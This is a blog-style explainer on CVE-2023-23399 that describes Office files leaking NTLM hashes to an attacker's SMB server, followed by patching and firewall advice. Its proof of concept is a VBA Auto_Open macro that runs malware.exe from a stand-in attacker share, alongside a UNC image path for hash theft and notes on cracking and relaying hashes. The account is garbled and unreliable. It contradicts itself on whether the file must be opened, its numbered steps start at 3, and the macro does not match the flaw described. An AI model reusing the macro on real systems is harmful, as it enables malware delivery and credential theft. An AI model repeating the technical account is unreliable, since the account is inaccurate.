CVE CyberSecurity Database News

CVE-2023-23399 - How Hackers Can Remotely Hack Microsoft Excel – Explained With Code and Exploit Details

Poster -

---

In early 2023, cybersecurity researchers uncovered a severe vulnerability in Microsoft Office, tracked as CVE-2023-23399. This bug made it possible for attackers to execute code remotely on a victim’s system – simply by convincing them to open a specially crafted Excel file. In this post, I’ll break down how this vulnerability works, walk you through how attackers exploit it, and what you can do to stay safe.

What is CVE-2023-23399?

CVE-2023-23399 is an elevation-of-privilege vulnerability involving how Microsoft Office handles certain Outlook and Excel files, specifically how it processes embedded links (UNC paths). The vulnerability allows attackers to trick Office into authenticating to a harmful SMB server, leaking the victim's NTLM hash and, in some cases, letting attackers run code on the victim’s machine – all before the user even opens the email or file.

The official Microsoft write-up is here:  
- Microsoft Security Update Guide - CVE-2023-23399

How Does The Exploit Work?

The exploit relies on malicious links embedded in Excel files (or Calendar invites, in Outlook), pointing to a remote SMB share using a UNC path such as \\attacker.com\share\payload. Here’s what happens:

Victim receives and opens the file (sometimes just previewing it in Outlook triggers this!).

3. Windows automatically tries to authenticate to the remote share using the victim’s credentials – specifically, their NTLM hash.
4. The attacker captures the NTLM hash, then cracks or relays it to get deeper access to the network, run malware, or access sensitive files.

Proof of Concept – Making A Malicious Excel File

Let’s see what a real-world malicious Excel file might look like. Here’s how an attacker might create one using VBA (Visual Basic for Applications):

' Save this as malicious.xlsm, then open in Excel
Sub Auto_Open()
    ' This line triggers Windows to connect to the attacker's SMB server
    Dim obj As Object
    Set obj = CreateObject("WScript.Shell")
    obj.Run "\\attacker.evil\share\malware.exe"
End Sub

Note: This code is for educational purposes only – never use malicious code!

\\attacker.evil\share\image.png

When Excel tries to load that image, it connects to the attacker’s server, leaking the NTLM hash in the process.

After collecting the NTLM hash, what’s next?

- NTLM Hash Cracking: Attackers attempt to crack the hash to get the victim’s plain-text password.
- NTLM Relay Attack: Even without cracking, attackers can "relay" the authentication to other servers inside the victim's network, sometimes letting them access file shares or even execute code remotely if SMB signing isn't enforced.

Read more about NTLM relay attacks here: HackTricks - NTLM Relay Attacks

In some cases, if the Excel file is part of a scheduled task or run with higher privileges, attackers can use this trick to run arbitrary code on the victim’s machine.

Official advisories

- Microsoft Security Update Guide: CVE-2023-23399
- CISA Alert: Patch Now!

Blog posts and technical details

- Huntress: Breaking Down CVE-2023-23399
- Rapid7: Technical Analysis – Outlook Vulnerability

Update Office and Windows: Install the latest security patches from Microsoft.

- Block outbound SMB/NTLM traffic at your firewall.

Conclusion

CVE-2023-23399 is a reminder that simply opening an Office file can be a risk if you’re behind on your security updates. Attackers love this bug because it works before you even open the file! Protect yourself by patching, monitoring, and following best practices for handling Office files.

Think this sounds scary? You’re right. But now you know what to look for, and how to block it.

Stay safe! If you want to test your own environment, always use your own test machines and networks – never attack unauthorized systems.

References

- Microsoft: CVE-2023-23399
- Huntress CVE-2023-23399 Analysis
- HackTricks: NTLM Relay


Let me know in the comments if you want detailed defense guides, detection scripts or more breakdowns of Office vulnerabilities!

Timeline

Published on: 03/14/2023 17:15:00 UTC
Last modified on: 04/11/2023 21:15:00 UTC